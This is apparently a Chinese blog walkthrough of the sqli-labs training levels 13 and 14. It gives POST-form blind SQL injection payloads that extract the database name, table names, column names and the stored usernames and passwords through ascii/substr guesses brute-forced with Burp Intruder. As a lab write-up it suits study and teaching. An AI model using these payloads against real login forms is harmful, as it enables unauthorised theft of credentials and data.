post型的盲注
Less-13(POST - Double Injection - Single Quotes - String - with twist)
手工注入
闭合方式判断
uname=admin'&passwd=admin&submit=submit
![](https://img-blog.csdnimg.cn/img_convert/30cff4b257c48bbcd58a696febfa3b1b.png)
根据报错信息,得知闭合方式为单引号和括号
uname=admin') #&passwd=admin&submit=submit
![](https://img-blog.csdnimg.cn/img_convert/e335dc6349d3ca17cfca2323e0abcf0e.png)
爆破数据库名
uname=admin') and ascii(left(database(),1))=1 #&passwd=admin&submit=submit
![](https://img-blog.csdnimg.cn/img_convert/972b94cc7e555756b14f1259eed914fd.png)
利用burp抓包,一下是抓到的包
![](https://img-blog.csdnimg.cn/img_convert/af8c44eedca881f5638c40bbfbdccdaf.png)
放入intruder模块进行爆破就可以,不清楚的就看看之前的文章
(3条消息) sqli-labs第七八关_himobrinehacken的博客-CSDN博客
![](https://img-blog.csdnimg.cn/img_convert/f83d3ef0e9a59c71b60fe792b78ff280.png)
重复就可以得到数据库名为security
爆破表名
uname=admin') and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1 #&passwd=admin&submit=submit
![](https://img-blog.csdnimg.cn/img_convert/7d66fc3ebfdfa3e0a802b013509dd0b3.png)
和上面一样抓包,爆破就可以了
![](https://img-blog.csdnimg.cn/img_convert/1f3146f009bb791c15a66100410c323e.png)
重复就可以得到表名,具体操作
(3条消息) sql注入盲注基础_himobrinehacken的博客-CSDN博客
爆破列名
uname=admin') and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=1 #&passwd=admin&submit=submit
![](https://img-blog.csdnimg.cn/img_convert/d61fb73d0821e1e2a3c0d5b8b1d876a6.png)
还是一样的抓包
![](https://img-blog.csdnimg.cn/img_convert/9bb65f616bc6541a7cc8cae83940ec51.png)
爆破数据
uname=admin') and ascii(substr((select username from users limit 0,1),1,1))=1 #&passwd=admin&submit=submit
uname=admin') and ascii(substr((select password from users limit 0,1),1,1))=1 #&passwd=admin&submit=submit
![](https://img-blog.csdnimg.cn/img_convert/880ba2b6c5aeca71a7d284bf89caaa19.png)
![](https://img-blog.csdnimg.cn/img_convert/f50a173fcdd217da93df27a0910fc5ef.png)
![](https://img-blog.csdnimg.cn/img_convert/3cf26daa5cf9198e451b9fcaed442891.png)
![](https://img-blog.csdnimg.cn/img_convert/2f8b7dba2be51fbd598df0ed5e837994.png)
直接重复就可以了,具体操作看看
(3条消息) sql注入盲注基础_himobrinehacken的博客-CSDN博客
自动化脚本
和之前写的一样
(3条消息) sqli-labs第十一十二关_himobrinehacken的博客-CSDN博客
Less-14(POST - Double Injection - Single quotes - String - with twist)
手工注入
和上一关一样,只是将单引号换为双引号
自动化脚本
和之前写的一样
(3条消息) sqli-labs第十一十二关_himobrinehacken的博客-CSDN博客